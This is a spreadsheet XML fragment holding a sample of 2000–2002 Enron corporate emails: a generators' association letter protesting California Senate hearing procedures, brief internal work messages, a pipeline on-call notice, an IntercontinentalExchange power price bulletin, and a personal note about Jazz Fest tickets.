'jess.hewitt@enron.com', 'joe.hartsoe@enron.com', 'brenda.barreda@enron.com', 'bill.votaw@enron.com'})</t>
  </si>
  <si>
    <t>Smutny Letter to Senator Dunn</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Jeff Dasovich/NA/Enron on 06/22/2001 07:10 PM -----_x000D_
_x000D_
	Tom Ross &lt;tross@mcnallytemple.com&gt;_x000D_
	06/22/2001 05:02 PM_x000D_
		 _x000D_
		 To: Jean Munoz &lt;jmunoz@mcnallytemple.com&gt;, "'Andy Brown (E-mail)'" _x000D_
&lt;ABB@eslawfirm.com&gt;, "'B Brown Andy (E-mail)'" &lt;andybrwn@earthlink.net&gt;, _x000D_
"'Baker Carolyn (E-mail)'" &lt;cabaker@duke-energy.com&gt;, "'Bob Escalante _x000D_
(E-mail)'" &lt;rescalante@riobravo-gm.com&gt;, "'Bob Weisenmiller (E-mail)'" _x000D_
&lt;rbw@mrwassoc.com&gt;, "'Curtis Kebler (E-mail)'" _x000D_
&lt;curtis_l_kebler@reliantenergy.com&gt;, "Dean. Nistetter (E-mail)" _x000D_
&lt;Dean.Nistetter@dynegy.com&gt;, "'Douglas Kerner (E-mail)'" &lt;DKK@eslawfirm.com&gt;, _x000D_
"'Greg Blue (E-mail)'" &lt;gtbl@dynegy.com&gt;, "'Jan Smutny-Jones (E-mail)'" _x000D_
&lt;smutny@iepa.com&gt;, "'Jeff Dasovich (E-mail)'" &lt;Jeff.Dasovich@enron.com&gt;, _x000D_
"'Joe Ronan (E-mail)'" &lt;joer@calpine.com&gt;, "'John Larrea (E-mail)'" _x000D_
&lt;john.g.larrea@williams.com&gt;, "'Julee Malinowski-Ball (E-mail)'" _x000D_
&lt;jmball@ns.net&gt;, "'Kassandra Gough (E-mail)'" &lt;kgough@calpine.com&gt;, "'kent _x000D_
Palmerton (E-mail)'" &lt;kent.palmerton@williams.com&gt;, "'Lynn Lednicky _x000D_
(E-mail)'" &lt;lale@dynegy.com&gt;, dpeters@mccabeandcompany.net, "'Marty Wilson _x000D_
(E-mail)'" &lt;mwilson@pstrategies.com&gt;, "'McNally Ray (E-mail)'" _x000D_
&lt;rmcnally@mcnallytemple.com&gt;, "''Nam Nguyen' (E-mail)'" _x000D_
&lt;nam.nguyen@powersrc.com&gt;, "'Norton Kelli (E-mail)'" _x000D_
&lt;knorton@mcnallytemple.com&gt;, "'Paula Hall-Collins (E-mail)'" _x000D_
&lt;paula.hall-collins@williams.com&gt;, "'Pigott Jack (E-mail)'" _x000D_
&lt;jackp@calpine.com&gt;, "'Richard Hyde (E-mail)'" &lt;rwhyde@duke-energy.com&gt;, _x000D_
"'Roger Pelote (E-mail)'" &lt;roger.pelote@williams.com&gt;, "'Stephanie-Newell _x000D_
(E-mail)'" &lt;stephanie-newell@reliantenergy.com&gt;, "'Sue Mara (E-mail)'" _x000D_
&lt;smara@enron.com&gt;, "Tom Williams (E-mail)" &lt;tcwillia@duke-energy.com&gt;, "'Alex _x000D_
Sugaoka (E-mail)'" &lt;alex.sugaoka@uaecorp.com&gt;, "'Bill Carlson (E-mail)'" _x000D_
&lt;william_carlson@wastemanagement.com&gt;, "'Bill Woods (E-mail)'" _x000D_
&lt;billw@calpine.com&gt;, "'Bob Ellery (E-mail)'" &lt;bellery@spi-ind.com&gt;, "'Bob _x000D_
Gates (E-mail)'" &lt;bob.gates@enron.com&gt;, "'Cody Carter (E-mail)'" _x000D_
&lt;cody.carter@williams.com&gt;, "'Curt Hatton (E-mail)'" _x000D_
&lt;Curt.Hatton@gen.pge.com&gt;, "'David Parquet'" &lt;david.parquet@enron.com&gt;, _x000D_
"'Dean Gosselin (E-mail)'" &lt;dean_gosselin@fpl.com&gt;, "'Doug Fernley (E-mail)'" _x000D_
&lt;fernley.doug@epenergy.com&gt;, "'Duane Nelsen (E-mail)'" _x000D_
&lt;dnelsen@gwfpower.com&gt;, "'Ed Tomeo (E-mail)'" &lt;ed.tomeo@uaecorp.com&gt;, _x000D_
"'Eileen Koch (E-mail)'" &lt;eileenk@calpine.com&gt;, "'Eric Eisenman (E-mail)'" _x000D_
&lt;eric.eisenman@gen.pge.com&gt;, "'Frank DeRosa (E-mail)'" _x000D_
&lt;frank.derosa@gen.pge.com&gt;, "Frazier Blaylock (E-mail)" _x000D_
&lt;frazier_blaylock@ogden-energy.com&gt;, "'Hap Boyd (E-mail)'" _x000D_
&lt;Hap_Boyd@enron.com&gt;, "'Hawks Jack (E-mail)'" &lt;jack.hawks@gen.pge.com&gt;, "'Jim _x000D_
Willey (E-mail)'" &lt;elliottsa@earthlink.net&gt;, "'Joe Greco (E-mail)'" _x000D_
&lt;jgreco@caithnessenergy.com&gt;, "'Jonathan Weisgall (E-mail)'" _x000D_
&lt;jweisgall@aol.com&gt;, "'Kate Castillo (E-mail)'" &lt;CCastillo@riobravo-gm.com&gt;, _x000D_
"'Kelly Lloyd (E-mail)'" &lt;kellyl@enxco.com&gt;, "'Ken Hoffman (E-mail)'" _x000D_
&lt;khoffman@caithnessenergy.com&gt;, "'Kent Fickett (E-mail)'" _x000D_
&lt;kfickett@usgen.com&gt;, "'Lynn Lednicky (E-mail)'" _x000D_
&lt;lynn.a.lednicky@dynegy.com&gt;, "'Marty McFadden (E-mail)'" _x000D_
&lt;marty_mcfadden@ogden-energy.com&gt;, "'Paula Soos'" _x000D_
&lt;paula_soos@ogden-energy.com&gt;, "'Randy Hickok (E-mail)'" _x000D_
&lt;rjhickok@duke-energy.com&gt;, "Rick S. Koebbe (E-mail)" _x000D_
&lt;rskoebbe@powerworksinc.com&gt;, "'Rob Lamkin (E-mail)'" _x000D_
&lt;rllamkin@seiworldwide.com&gt;, "'Ross Ain (E-mail)'" &lt;ain@worldnet.att.net&gt;, _x000D_
"'Steve Iliff'" &lt;siliff@riobravo-gm.com&gt;, "'Steve Ponder (E-mail)'" _x000D_
&lt;steve_ponder@fpl.com&gt;, "'Tony Wetzel (E-mail)'" &lt;twetzel@thermoecotek.com&gt;, _x000D_
"'William Hall (E-mail)'" &lt;wfhall2@duke-energy.com&gt;, _x000D_
trusso@mcnallytemple.com, sadlersa@earthlink.net, mstultz@epsa.org, _x000D_
rtemple@mcnallytemple.com, tracy.fairchild@edelman.com, _x000D_
megan.beiser@edelman.com, deborah.fiorito@dynegy.com, lchurch@epsa.org, Katie _x000D_
Kaplan &lt;kaplan@iepa.com&gt;, tcwillia@duke-energy.com, rwhyde@duke-energy.com, _x000D_
tmcmorrow@manatt.com, Suzy.L.Rodriguez@dynegy.com, ppitts@wiredworld1.com, _x000D_
mnobili@cal-lobby.com, sscsus@aol.com, kvellandi@pstrategies.com, _x000D_
kelly@hnks.com, kirk@cea.com, jbkinney@duke-energy.com_x000D_
		 cc: _x000D_
		 Subject: Smutny Letter to Senator Dunn_x000D_
_x000D_
_x000D_
_x000D_
June 22, 2001_x000D_
_x000D_
_x000D_
The Honorable Joseph Dunn_x000D_
Chair, Senate Select Committee_x000D_
California State Senate_x000D_
Room 2080_x000D_
California State Capitol_x000D_
Sacramento, CA 95814_x000D_
_x000D_
Dear Senator Dunn:_x000D_
_x000D_
Earlier this year, you met individually with IEP and various other parties to _x000D_
explain the purpose of the Senate Select Committee?s hearing and the process _x000D_
under which they were to be conducted.  You made it very clear that you were _x000D_
planning to have fact-finding hearings based upon fundamental fairness and _x000D_
due process.  You made a further commitment that there would be no _x000D_
surprises.  Prior to today, the hearings have been conducted consistent with _x000D_
that representation._x000D_
_x000D_
Unfortunately, today it appears that the Committee has set a new course that _x000D_
radically departs from these previous commitments.  Today, the Committee is _x000D_
hearing testimony from several surprise witnesses.  These witnesses are _x000D_
former employees of San Diego Gas and Electric (SDG&amp;E) under contract with _x000D_
Duke Energy for an interim period during which Duke Energy operated the _x000D_
facilities in San Diego.   It is our understanding that these former contract _x000D_
employees are alleging that the company failed to properly maintain these _x000D_
facilities, and they are alleging that Duke Energy cycled these facilities _x000D_
differently than the former owner, SDG&amp;E.  It is also our understanding that _x000D_
Duke Energy will not be afforded the opportunity to contemporaneously _x000D_
challenge these allegations and/or provide an explanation as to the _x000D_
operational behavior of the facilities.  In short, the hearings are being _x000D_
reduced to a media event, giving credence to the unsustainable allegations of _x000D_
disgruntled ex-employees._x000D_
_x000D_
Respectfully, it would appear that the Committee has wandered far afield of _x000D_
its stated goals.  These hearings have the potential of identifying what went _x000D_
wrong with California?s energy policy and how to fix it.  However, this will _x000D_
only occur if this inquiry is based on informal facts and complete _x000D_
information, not innuendo and unsubstantiated allegations.  It is the pursuit _x000D_
of facts, not headlines, which will solve California?s energy crisis.  These _x000D_
facts will be revealed only in a fair process, where allegations made are _x000D_
subject to contemporaneous response.  _x000D_
_x000D_
It is our hope that today?s process is an aberration, and not a departure _x000D_
from your commitments.  The Committee is at a crossroads.  It can choose to _x000D_
engage in fact-finding and analysis, or it can be reduced to a witch-hunt in _x000D_
pursuit of headlines.  For the benefit of all Californian?s, the Committee _x000D_
should focus on fact-finding and analysis._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
_x000D_
_x000D_
Jan Smutny-Jones_x000D_
Executive Director_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 18 Oct 2001 14:35:18 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'eric.scott@enron.com'})</t>
  </si>
  <si>
    <t>RE: PIRA Gas Survey</t>
  </si>
  <si>
    <t>I referred him to Lavorato_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Scott, Eric  _x000D_
Sent:	Thursday, October 18, 2001 2:18 PM_x000D_
To:	Arnold, John_x000D_
Subject:	PIRA Gas Survey_x000D_
_x000D_
Shuttlesworth just called me again regarding Enron's feelings to a PIRA gas storage survey.  I gave him your number and told him to call you directly._x000D_
_x000D_
Eric</t>
  </si>
  <si>
    <t>Fri, 23 Mar 2001 02:15:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Shotgun san diego</t>
  </si>
  <si>
    <t>What's up in the hood?  It sounds like you guys live in Compton instead of _x000D_
San Diego?  Make sure Emma starts packing when she starts kindergarten.  If _x000D_
she is strapped, she can shoot back at these SOBs.  Yet another reason Texas _x000D_
is better than Cali - we all have guns so no one shoots up schools because _x000D_
they know someone else has got heat and might put a cap in their ass.  _x000D_
_x000D_
Do you guys want me to order you Jazz Fest tickets when I order ours?  I am _x000D_
putting in an order for alot of people because if I mail order them it only _x000D_
costs $3 total as opposed to ticket master's $3 fee per ticket.  Since I am _x000D_
ordering ours this way, I can order everyone's and they only pay the ticket _x000D_
price(I eat the $3 because I am doing ours this way anyway).  The tickets are _x000D_
$15 through the mail per day as opposed to $20 at the gate and $18 through _x000D_
ticketmaster.  Let me know.  I am ordering all three days for ashley and I _x000D_
hoping we go all three days._x000D_
PL</t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 08:18:27 -0800 (PST)</t>
  </si>
  <si>
    <t>CGT - Late Duty / Weekend Contact</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
                       COLUMBIA GULF TRANSMISSION COMPANY_x000D_
                        NOTICE TO ALL INTERESTED PARTIES_x000D_
                                NOVEMBER 26, 2001_x000D_
_x000D_
Notice ID: 3292_x000D_
5 - NO RESPONSE REQUIRED_x000D_
_x000D_
For after hours business on weekdays a Columbia Gulf Representative will be_x000D_
available to assist you at the below phone numbers._x000D_
_x000D_
For the weekend of December 1st through December 2nd the Columbia Gulf_x000D_
Representative available to assist you will be:_x000D_
_x000D_
                             Mike Williford_x000D_
_x000D_
The following phone numbers can be used to contact Columbia Gulf:_x000D_
_x000D_
                            713-305-1469_x000D_
                                 or_x000D_
                            713-267-4550_x000D_
_x000D_
Please note that the Columbia Navigator system is unavailable every Sunday from_x000D_
11:00 p.m. (Eastern) until Monday at 6:00 a.m. (Eastern) for routine system_x000D_
maintenance._x000D_
</t>
  </si>
  <si>
    <t>Sun, 7 May 2000 04:34:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Tim _x000D_
_x000D_
Can you get someone (perhaps a marketer) to give me a one pager on the WAPA _x000D_
deal.</t>
  </si>
  <si>
    <t>Thu, 18 Oct 2001 10:27:44 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                   IntercontinentalExchange                =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                            =20_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                   Firm Power Price Bulletin                               =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                            =20_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                   For Power Delivered on Friday, October   19, 2001       =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                  =20_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                   (Trade Date of Thursday, October   18, 2=_x000D_
001)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20_x000D_
Click here to access index history .                                       =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                  =20_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                   * volume represents sell-side only *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20_x000D_
_x000D_
Hub=09High=09Low=09Wtd Avg Index=09Change ($)=09Vol (Mwh)=09_x000D_
Cinergy=09         $24.00=09         $22.00=09         $22.33=09-    .58=09=_x000D_
          53,600=09_x000D_
Comed=09         $21.50=09         $20.50=09         $20.96=09-    .85=09  =_x000D_
         9,600=09_x000D_
Entergy=09         $20.90=09         $19.70=09         $20.22=09-   1.01=09=_x000D_
          25,600=09_x000D_
Nepool=09         $39.00=09         $39.00=09         $39.00=09+   1.00=09 =_x000D_
          1,600=09_x000D_
PJM-West=09         $25.80=09         $25.25=09         $25.47=09-   1.49=_x000D_
=09          35,200=09_x000D_
SP-15=09         $26.50=09         $25.75=09         $26.11=09-   4.07=09  =_x000D_
        10,400=09_x000D_
TVA=09         $23.25=09         $22.00=09         $22.50=09-    .11=09    =_x000D_
      15,200=09_x000D_
_x000D_
_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                   Includes all trades done from 6 AM to 11=_x000D_
 AM Central Prevailing Time on the trade date specified for financially fir=_x000D_
m power delivered during the on-peak hours (6 AM - 10 PM CPT for Eastern hu=_x000D_
bs / 6 AM - 10 PM Pacific Prevailing Time for Western hubs) on the delivery=_x000D_
 date(s) specified.                                                        =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
       =20_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                       IntercontinentalExchange is the world's most liquid =_x000D_
trading platform for over-the-counter energy and metals.  Active markets in=_x000D_
clude North American power and natural gas, global crude and refined oil pr=_x000D_
oducts, and precious metals.  Traded instruments include forwards, swaps, a=_x000D_
nd options.                                                                =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                            =20_x000D_
In order to receive the proprietary information contained in this email, yo=_x000D_
u acknowledge and agree that you shall not further disseminate the Intercon=_x000D_
tinentalExchange Market Data contained herein to any person or entity witho=_x000D_
ut the express written consent of IntercontinentalExchange.    Furthermore,=_x000D_
 you acknowledge that (1) IntercontinentalExchange has exclusive and valuab=_x000D_
le property rights in this data; (2) IntercontinentalExchange's data is bei=_x000D_
ng made available to you only for your own business or personal activities;=_x000D_
 and (3) you cannot communicate the data, in any form, to any other person =_x000D_
or entity without the express written consent of IntercontinentalExchange. =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
               =20_x000D_
This data is provided to you free of charge.  IntercontinentalExchange rese=_x000D_
rves the right to cancel this service at any time for any reason or no reas=_x000D_
on at all.                                                                 =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
               =20_x000D_
You agree that IntercontinentalExchange does not make any representations o=_x000D_
r warranties, express or implied, with respect to the data.                =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                         =20_x000D_
To become an Exchange Participant or inquire about the indices, please cont=_x000D_
act sales@intcx.com .                                                      =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                =20_x000D_
To unsubscribe from this service, click here unsubscribe .                 =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                         =_x000D_
=20_x000D_
                                                                     </t>
  </si>
  <si>
    <t>Wed, 14 Feb 2001 02:23:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'janel.guerrero@enron.com', 'tom.briggs@enron.com', 'harry.kingerski@enron.com', 'james.steffes@enron.com', 'shelley.corman@enron.com', 'richard.shapiro@enron.com', 'joe.hartsoe@enron.com'})</t>
  </si>
  <si>
    <t>Murkowski bill TOC</t>
  </si>
  <si>
    <t xml:space="preserve">Linda Robertson asked that I send you the attached table of contents from the _x000D_
DRAFT Murkowski energy bill for discussion at this Friday's meeting.  Please _x000D_
come prepared with any thoughts you have as to changes/additions/deletions.  _x000D_
Thanks._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 18 Mar 2002 08:14:56 -0800 (PST)</t>
  </si>
  <si>
    <t>New Contract System - Impact on One-part/Two-part Indicator</t>
  </si>
  <si>
    <t xml:space="preserve">Please be advised that we successfully converted existing data and implemented the new contract/capacity release system for Transwestern last week.  With that, there is one change that will impact the Commercial group.  In the old CBS system, the Contract Admin group was responsible for identifying whether a contract was negotiated as a one-part or two-part rate.  Until a deal sheet is built and the new rates/revenue system is implemented, the Marketers will continue to update discounts in the existing CBS system under Negotiated Rates Maintenance.  _x000D_
_x000D_
Additionally, the Marketer will be responsible for updating within the same rate maintenance screen the one-part/two-part flag for all new firm contracts under the 'reservation' charge code.  If a contract amendment requires a change to this indicator, this must also be captured; however, be advised that this field does not have effective dates.  Therefore, if the indicator is not applicable until a future date, the one-part/two-part flag cannot be updated because the current billing will pick up this change.  I will provide any additional training if necessary regarding the loading of rates/indicators.  If you have any questions, please feel free to contact me._x000D_
_x000D_
As a reminder, we have scheduled internal demos of the new system today at 1:30pm and 3pm as well as this Thursday at 1:30pm in EB3907._x000D_
_x000D_
_x000D_
Thanks,_x000D_
Elizabeth_x000D_
</t>
  </si>
  <si>
    <t>Wed, 8 Aug 2001 06:23:58 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">I made some modifications, but we may want to make more ... I think we need to emphasoze the reasonableness of our offer.  The audience should be redefined as the Senators, not just the members of the committee.  Let's discuss._x000D_
_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Thu, 13 Jan 2000 04:43:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Y2K Data</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Randall L Gay/HOU/ECT on 01/13/2000 12:42 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Dawn C Kenne_x000D_
01/13/2000 10:14 AM_x000D_
To: Jim Coffey/HOU/ECT@ECT, Sheila Glover/HOU/ECT@ECT, Kristin _x000D_
Albrecht/HOU/ECT@ECT, Robert Superty/HOU/ECT@ECT, D Todd Hall/HOU/ECT@ECT, _x000D_
Mark Fondren/HOU/ECT@ECT, Jackie Nelson/HOU/ECT@ECT, Karen _x000D_
Gruesen/HOU/ECT@ECT, Anita Eisenbrandt/HOU/ECT@ECT, Blanca A _x000D_
Lopez/HOU/ECT@ECT, Cassandra Pollack/Corp/Enron@ENRON, Justin _x000D_
Rostant/HOU/ECT@ECT, Patricia Bloom/HOU/ECT@ECT, Danthea Dumayas/HOU/ECT@ECT, _x000D_
Stacey Burnett/HOU/ECT@ECT, Jennifer K Longoria/HOU/ECT@ECT, Simone La _x000D_
Rose/HOU/ECT@ECT, Phyllis R Kennedy/HOU/ECT@ECT, Patricia _x000D_
Anderson/HOU/ECT@ECT, Rhonda Washington/HOU/ECT@ECT, Yvette _x000D_
Miroballi/HOU/ECT@ECT, Rebecca Ford/HOU/ECT@ECT, Jennifer deBoisblanc _x000D_
Denny/HOU/ECT@ECT, B Scott Palmer/HOU/ECT@ECT, Randall L Gay/HOU/ECT@ECT, _x000D_
Melissa Ann Murphy/HOU/ECT@ECT, Trisha Hughes/HOU/ECT@ECT, Matt A _x000D_
Brown/HOU/ECT@ECT, Bennett Kaufman/HOU/ECT@ECT, Theresa T Brogan/HOU/ECT@ECT, _x000D_
Rhonda Smith/HOU/ECT@ECT, Jeffrey C Gossett/HOU/ECT@ECT, Mark _x000D_
Friedman/HOU/ECT@ECT, David Oliver/HOU/ECT@ECT, David Baumbach/HOU/ECT@ECT, _x000D_
Kenneth W Walther/HOU/ECT@ECT_x000D_
cc: William Kelly/HOU/ECT@ECT, Brent A Price/HOU/ECT@ECT, Brenda F _x000D_
Herod/HOU/ECT@ECT _x000D_
Subject: Y2K Data_x000D_
_x000D_
Thank you for your help in getting the Y2K data to us to burn onto the CD's.  _x000D_
The next process is to destroy the CD's.  All CD's will be destroyed if we do _x000D_
not hear back from you by 10:00 am tomorrow.  Please contact Will Kelly at _x000D_
853-9710 or by e-mail._x000D_
_x000D_
Please relay this information to anyone in your group with data on these CD's _x000D_
to make sure they do not need it.  _x000D_
</t>
  </si>
  <si>
    <t>Thu, 20 Dec 2001 14:58:21 -0800 (PST)</t>
  </si>
  <si>
    <t>Fwd: FW: Tim Tipton input on Seminars/Forums Sub Group</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
Return-Path: &lt;Vince.J.Kaminski@enron.com&gt;_x000D_
Received: from  rly-xa02.mx.aol.com (rly-xa02.mail.aol.com [172.20.105.71]) by air-xa03.mail.aol.com (v83.24) with ESMTP id MAILINXA31-1219084454; Wed, 19 Dec 2001 08:44:54 -0500_x000D_
Received: from  postmaster.enron.com (outbound5.enron.com [192.152.140.9]) by rly-xa02.mx.aol.com (v83.18) with ESMTP id MAILRELAYINXA28-1219084420; Wed, 19 Dec 2001 08:44:20 -0500_x000D_
Received: from corp.enron.com (nahou-msmsw02p.corp.enron.com [192.168.110.109])	by postmaster.enron.com (8.10.1/8.10.1/external_corp-1.08) with ESMTP id fBJDiJ011735	for &lt;vkaminski@aol.com&gt;; Wed, 19 Dec 2001 07:44:19 -0600 (CST)_x000D_
Received: from nahou-mscnx04p.corp.enron.com (unverified) by corp.enron.com (Content Technologies SMTPRS 4.2.1) with SMTP id &lt;T57ea779128c0a86e6d688@corp.enron.com&gt; for &lt;vkaminski@aol.com&gt;; Wed, 19 Dec 2001 07:44:19 -0600_x000D_
Received: from NAHOU-MSMBX03V.corp.enron.com ([192.168.110.41]) by nahou-mscnx04p.corp.enron.com with Microsoft SMTPSVC(5.0.2195.2966);	 Wed, 19 Dec 2001 07:44:11 -0600_x000D_
X-MimeOLE: Produced By Microsoft Exchange V6.0.4712.0_x000D_
content-class: urn:content-classes:message_x000D_
MIME-Version: 1.0_x000D_
Content-Type: multipart/mixed ; boundary="----_=_NextPart_001_01C18893.3CB00697"_x000D_
Subject: FW: Tim Tipton input on Seminars/Forums Sub Group_x000D_
Date: Wed, 19 Dec 2001 07:44:10 -0600_x000D_
Message-ID: &lt;31738B46B7BD864080808A19977D9F757ABF57@NAHOU-MSMBX03V.corp.enron.com&gt;_x000D_
X-MS-Has-Attach:_x000D_
X-MS-TNEF-Correlator:_x000D_
Thread-Topic: Tim Tipton input on Seminars/Forums Sub Group_x000D_
Thread-Index: AcGIH5DAjuiufvQSEdWxJwBQi+MJ2QAc6NkA_x000D_
From: "Kaminski, Vince J" &lt;Vince.J.Kaminski@ENRON.com&gt;_x000D_
To: "Kaminski, Vince J" &lt;Vince.J.Kaminski@ENRON.com&gt;_x000D_
Cc: &lt;vkaminski@aol.com&gt;_x000D_
X-OriginalArrivalTime: 19 Dec 2001 13:44:11.0578 (UTC) FILETIME=[3D75B9A0:01C18893]_x000D_
X-Mailer: Unknown (No Version)_x000D_
_x000D_
